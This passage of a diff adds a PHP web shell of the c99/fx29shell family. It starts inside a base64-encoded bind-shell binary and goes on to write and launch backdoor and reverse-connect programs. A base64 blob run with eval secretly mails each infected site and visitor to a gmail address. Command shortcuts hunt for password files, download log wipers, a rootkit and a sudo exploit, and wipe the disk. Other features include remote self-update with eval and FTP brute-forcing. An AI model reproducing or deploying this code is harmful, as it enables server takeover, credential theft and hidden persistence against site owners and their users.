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9nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function cf($fname,$text) {
+  $w_file=@fopen($fname,"w") or err();
+  if($w_file) {
+    @fputs($w_file,@base64_decode($text));
+    @fclose($w_file);
+  }
+}
+
+function cfb($fname,$text) {
+  $w_file=@fopen($fname,"w") or bberr();
+  if($w_file) {
+    @fputs($w_file,@base64_decode($text));
+    @fclose($w_file);
+  }
+}
+function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
+function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
+  $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+  $por = $_POST['backconnectport'];
+  if (is_writable(".")) {
+    cfb("shbd",$backdoor);
+    ex("chmod 777 shbd");
+    $cmd = "./shbd $por";
+    exec("$cmd > /dev/null &");
+    $scan = myshellexec("ps aux");
+  } else {
+    cfb("/tmp/shbd",$backdoor);
+    ex("chmod 777 /tmp/shbd");
+    $cmd = "./tmp/shbd $por";
+    exec("$cmd > /dev/null &");
+    $scan = myshellexec("ps aux");
+  }
+  if (eregi("./shbd $por",$scan)) {
+    $data = ("\n<br>Backdoor setup successfully.");
+  } else {
+    $data = ("\n<br>Process not found, backdoor setup failed!");
+  }
+  $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
+  if (is_writable(".")) {
+    cf("back",$back_connect_pl);
+    $p2 = which("perl");
+    $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("back")) { unlink("back"); }
+  } else {
+    cf("/tmp/back",$back_connect_pl);
+    $p2 = which("perl");
+    $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+  }
+  $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) {
+  if (is_writable(".")) {
+    cf("backc",$back_connect_c);
+    ex("chmod 777 backc");
+    $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("backc")) { unlink("backc"); }
+  } else {
+    ex("chmod 777 /tmp/backc");
+    cf("/tmp/backc",$back_connect_c);
+    $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
+  }
+  $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+}
+//End of Backdoor
+
+//Starting calls
+@ini_set("max_execution_time",0);
+if (!function_exists("getmicrotime")) {
+  function getmicrotime() {
+    list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
+  }
+}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data));
+if (get_magic_quotes_gpc()) {
+  if (!function_exists("strips")) {
+    function strips(&$arr,$k="") {
+      if (is_array($arr)) {
+        foreach($arr as $k=>$v) {
+          if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
+        }
+      } else {$arr = stripslashes($arr);}
+    }
+  }
+  strips($GLOBALS);
+}
+//CONFIGURATIONS
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+// Registered file-types.
+$ftypes  = array(
+    "html"=>array("html","htm","shtml"),
+    "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+    "exe"=>array("sh","install","bat","cmd"),
+    "ini"=>array("ini","inf","conf"),
+    "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+    "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+    "sdb"=>array("sdb"),
+    "phpsess"=>array("sess"),
+    "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+//Registered executable file-types.
+$exeftypes  = array(
+    getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+    "perl %f%" => array("pl","cgi")
+);
+//Highlighted files.
+$regxp_highlight  = array(
+    array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+    array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+    array("\.gz$",1,"<font color=#C082FF>","</font>"),
+    array("\.tar$",1,"<font color=#C082FF>","</font>"),
+    array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+    array("\.zip$",1,"<font color=#C082FF>","</font>"),
+    array("\.rar$",1,"<font color=#C082FF>","</font>"),
+    array("\.php$",1,"<font color=#00FF00>","</font>"),
+    array("\.php3$",1,"<font color=#00FF00>","</font>"),
+    array("\.php4$",1,"<font color=#00FF00>","</font>"),
+    array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+    array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+    array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+    array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+    array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+    array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+    array("\.png$",1,"<font color=#00FFFF>","</font>"),
+    array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+    array("\.html$",1,"<font color=#00CCFF>","</font>"),
+    array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+//Command Aliases
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."dQB.tgz;tar -zxf dQB.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind
+;tar -zxvf bind.tar.gz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+    );
+}
+//PHP Filesystem Functions, dhie-Q TriCkz
+$phpfsaliases = array(
+    array("Read File", "read"),
+    array("Write File (PHP5)", "write"),
+    array("Copy", "copy"),
+    array("Rename/Move", "rename"),
+    array("Delete", "delete"),
+    array("Make Dir","mkdir"),
+    array("-----", ""),
+    array("Download", "download"),
+    array("Download (Binary Safe)", "downloadbin"),
+    array("Change Perm (0755)", "chmod"),
+    array("Find Writable Dir", "fwritabledir"),
+    array("Find Pathname Pattern", "glob"),
+);
+
+//Quick launch
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Enumerate",$enumerate),
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("PHP-Code",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=fxmailer"),
+    array("milw0rm it!",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Word-Lists","http://darkc0de.com/wordlists/"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Self-Kill",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+
+if (!$win) {
+$quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch2[] = array("Backdoor",$surl."act=shbd");
+$quicklaunch2[] = array("Back-Connect",$surl."act=backc");
+}
+
+//Highlight-code colors
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+//END OF CONFIGURATIONS
+
+//STOP EDITING!
+
+//Authentication
+@set_time_limit(0);
+$tmp = array();
+foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($login)) {
+  if (empty($md5_pass)) {$md5_pass = md5($pass);}
+  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": ".$login_txt."\"");
+    header("HTTP/1.0 401 Unauthorized");
+    exit($accessdeniedmess);
+  }
+}
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($selfwrite or $updatenow) {
+    @ob_clean();
+    c99sh_getupdate($selfwrite,1);
+    exit;
+  }
+  $sess_data = unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) {$sess_data = array();}
+  if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+  if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+  if (!function_exists("c99getsource")) {
+    function c99getsource($fn) {
+      global $c99sh_sourcesurl;
+      $array = array(
+        "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+        "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+        "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+        "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+        "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+        "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+      );
+      $name = $array[$fn];
+      if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("c99sh_getupdate")) {
+    function c99sh_getupdate($update = TRUE) {
+      $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+      $data = @file_get_contents($url);
+      if (!$data) {return "Can't connect to update-server!";}
+      else {
+        $data = ltrim($data);
+        $string = substr($data,3,ord($data{2}));
+        if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+        if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+        if ($data{0} == "\x99" and $data{1} == "\x03") {
+          $string = explode("|",$string);
+          if ($update) {
+            $confvars = array();
+            $sourceurl = $string[0];
+            $source = file_get_contents($sourceurl);
+            if (!$source) {return "Can't fetch update!";}
+            else {
+              $fp = fopen(__FILE__,"w");
+              if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+              else {
+                fwrite($fp,$source);
+                fclose($fp);
+                return "Thanks! Update completed.";
+              }
+            }
+          }
+          else {return "New version are available: ".$string[1];}
+        }
+        elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+          eval($string);
+          return 1;
+        }
+        else {return "Error in protocol: segmentation failed! (".$data.") ";}
+      }
+    }
+  }
+  if (!function_exists("c99_buff_prepare")) {
+    function c99_buff_prepare() {
+      global $sess_data;
+      global $act;
+      foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+      foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+      $sess_data["copy"] = array_unique($sess_data["copy"]);
+      $sess_data["cut"] = array_unique($sess_data["cut"]);
+      sort($sess_data["copy"]);
+      sort($sess_data["cut"]);
+      if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+      else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+    }
+  }
+  c99_buff_prepare();
+  if (!function_exists("c99_sess_put")) {
+    function c99_sess_put($data) {
+      global $sess_cookie;
+      global $sess_data;
+      c99_buff_prepare();
+      $sess_data = $data;
+      $data = serialize($data);
+      setcookie($sess_cookie,$data);
+    }
+  }
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("str2mini")) {
+    function str2mini($content,$len) {
+      if (strlen($content) > $len) {
+        $len = ceil($len/2) - 2;
+        return substr($content, 0,$len)."...".substr($content,-$len);
+      } else {return $content;}
+    }
+  }
+  if (!function_exists("view_size")) {
+    function view_size($size) {
+      if (!is_numeric($size)) { return FALSE; }
+      else {
+        if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+        elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+        elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+        else {$size = $size . " B";}
+        return $size;
+      }
+    }
+  }
+  if (!function_exists("fs_copy_dir")) {
+    function fs_copy_dir($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+      $h = opendir($d);
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
